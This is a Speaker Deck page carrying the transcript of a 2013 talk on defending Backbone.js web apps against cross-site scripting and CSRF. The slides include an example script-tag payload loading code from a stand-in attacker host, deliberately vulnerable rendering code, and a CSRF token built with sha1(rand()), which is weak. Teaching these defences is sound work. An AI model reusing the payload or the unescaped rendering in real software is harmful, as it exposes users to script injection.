Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing JavaScript Web Applications

A5b424d4146905962a24acd6815aeb84?s=47 Stephen Thomas
June 17, 2013
Technology
4
370

Securing JavaScript Web Applications

A5b424d4146905962a24acd6815aeb84?s=128

Stephen Thomas

June 17, 2013
Tweet

More Decks by Stephen Thomas

See All by Stephen Thomas
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
20
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
79
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
2.1k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
1
2.3k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
2.1k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
5
2.3k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
8
650
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
2
280

Other Decks in Technology

See All in Technology
4ca55ec64603f424638409b6e0ee7e65?s=48 halhira
1
110
53850955f15249a1a9dc49df6113e400?s=48 line_developers
PRO
1
130
3115a782126be714b5f94d24073c957d?s=48 oracle4engineer
2
490
272ea9518ccdb2ed71b73ac87b7901f8?s=48 hponka
0
1.1k
88964b936e864ca7d326272eaa70fa9a?s=48 hgsgtk
1
850
3f0d60d6727ea76dfc9f7863f8e035c4?s=48 aizurage
0
120
847a328633b1df6b11cc2f72430025e6?s=48 ks91
PRO
0
320
5c3556b7c8c0ab6bc90a62161a8315f8?s=48 gracia
0
940
F4d37a67ce86b2f962c79d73a9127d3c?s=48 fortkle
0
460
7fb9a8ddaea2ddc368f12a5d08cea86a?s=48 yuu26
1
1.1k
C65a5dd24a6781ffc618377347a0c48a?s=48 asahi_k2
0
740
B1dca90d4b3ffd2ccd918774e1ba170d?s=48 hmatsu47
2
140

Featured

See All Featured
433acaea1012b25d97ae66da9b998dad?s=48 malarkey
392
61k
168ccec72eee0530b818d44f3fedaacf?s=48 shlominoach
176
7.6k
E195ae45320d9202eaa01c9f1d31a416?s=48 marktimemedia
7
440
48c098b6579220a67a6ba949be6e4b5a?s=48 revolveconf
200
9.7k
Dafc4723e9a1c067796c0fec6f509774?s=48 lemiorhan
628
47k
78b475797a14c84799063c7cd073962f?s=48 holman
462
280k
465724d73fe3a92c0879fdfb43a3a6f3?s=48 philhawksworth
192
8.9k
39488f9d172ab92fd352f2cd7b73258d?s=48 mza
80
4.2k
56c4053438af8e8b90d6f53cbb7573be?s=48 jakevdp
776
200k
761be20b5ebd271008bcee1244fc5b52?s=48 matthewcrist
73
7.5k
A9a491b0fcbe0fbce3d64063a37add99?s=48 rmw
12
870
Eb8975af8e49e19e3dd6b6b84a542e26?s=48 qrush
285
19k

Transcript

  1. stephen@sathomas.me icon-comment icon-comment-alt icon-comments icon-comments-alt icon-credit-card icon-dashboard icon-download icon-download-alt icon-edit

    icon-envelope icon-envelope-alt icon-key icon-leaf icon-legal icon-lemon icon-lock icon-unlock icon-magic icon-magnet icon-map-marker icon-minus icon-minus-sign icon-resize-horiz icon-resize-verti icon-retweet icon-road icon-rss icon-screenshot icon-search icon-share icon-share-alt icon-shopping-c http://speakerdeck.com/sathomas icon-paper-clip icon-indent-right icon-tab Directional Icons icon-arrow-down icon-arrow-left icon-arrow-right icon-arrow-up icon-chevron-down icon-circle-arrow-down icon-circle-arrow-left icon-circle-arrow-right icon-circle-arrow-up icon-chevron-left icon-car icon-car icon-car icon-car icon-ch Video Player Icons icon-play-circle icon-play icon-step-backward icon-fast-backward icon-fas icon-ste Securing JavaScript Web Applications Stephen Thomas

  2. Most Common Attacks on Web Applications 1. Cross Site Scripting

    (XSS) 2. Cross Site Request Forgery (CSRF) (both are based on JavaScript) Source: Computer Weekly (quoting FireHost)

  3. Cross Site Scripting (What you think) your.web.app.com victim great content

  4. your.web.app.com victim great content + attack script evil.web.site.com 1 2

    Cross Site Scripting (Reality)

  5. The Vulnerability: User Supplied Content I like your post. Comment:

    Submit

  6. Naively Collect Content var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = this.$('input[name=comment]').val(); this.model.save({newComment: newComment}); }, ... });

  7. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  8. The Attack I like your post. <script src="http://evil.web.site.com.badscript.js"> </script> Comment:

    Submit

  9. Naively Collect Content (including the script tag) var NewCommentView =

    Backbone.View.extend({ ... events: { "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = this.$('input[name=comment]').val(); this.model.save({newComment: newComment}); }, ... });

  10. Deliver the Content your.web.app.com victim great content + attack script

    1

  11. Naively Render Content (including the script tag) var CommentView =

    Backbone.View.extend({ ... template: _.template('<p><%= comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  12. your.web.app.com victim great content + attack script evil.web.site.com 1 2

    Cross Site Scripting

  13. The Fix: Turn Bad Content I like your post! <script

    src="http://evil.web.site.com/badscript.js"> </script>

  14. The Fix: Into Safe Content I like your post! &lt;script

    src=&quot;http://evil.web.site.com/ badscript.js&quot;&gt; &lt;/script&gt;

  15. Escape on Input var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = _.escape( this.$('input[name=comment]').val() ); this.model.save({newComment: newComment}); }, ... });

  16. Escape on Input var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = _.escape( this.$('input[name=comment]').val() ); this.model.save({newComment: newComment}); }, ... });

  17. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  18. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  19. Safely Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.text(this.template(this.model.toJSON())); }, ... });

  20. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  21. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  22. Safely Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%-

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  23. Cross Site Request Forgery (What you think) your.web.app.com suspicious.web.site.com

  24. your.web.app.com suspicious.web.site.com Cross Site Request Forgery (Reality)

  25. • JavaScript code loaded from suspicious.web.site.com can issue AJAX requests

    to your.web.app.com • If the user has a tab or window open to your.web.app.com, those AJAX requests will include your session authorization cookies. • Your server will think they’re legitimate requests and respond accordingly. The Vulnerability: AJAX Requests

  26. The Fix: Synchronization Tokens <?php setcookie("X-CSRF-Token", sha1(rand())); echo file_get_contents( "index.html"

    ); ?> • Server sends an additional cookie that is set to a random value.

  27. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; }

  28. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; } • Client reads the value of this special cookie.

  29. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; } • Client returns the value as a custom HTTP header.

  30. The Fix: Synchronization Tokens <?php if ($_SERVER['HTTP_X_CSRF_TOKEN'] != $_COOKIE['X-CSRF-Token']) {

    header('Status: 403 Forbidden'); exit(); } /* process request normally */ ?> • Server makes sure custom HTTP header is present and matches the cookie.

  31. Why Do Synchronization Tokens Work? Even though AJAX requests that

    suspicious.web.site.com makes to your.web.app.com will include your cookies, Javascript code from suspicious.web.site.com cannot read the values of those cookies. It cannot, therefore, set the custom HTTP header values for which your server is checking.

  32. Single Page Web Apps • Don’t re-learn old lessons the

    hard way. • Protect against JavaScript-based attacks such as XSS and CSRF. • Oh yeah, protect against other attacks (SQL Injection) also.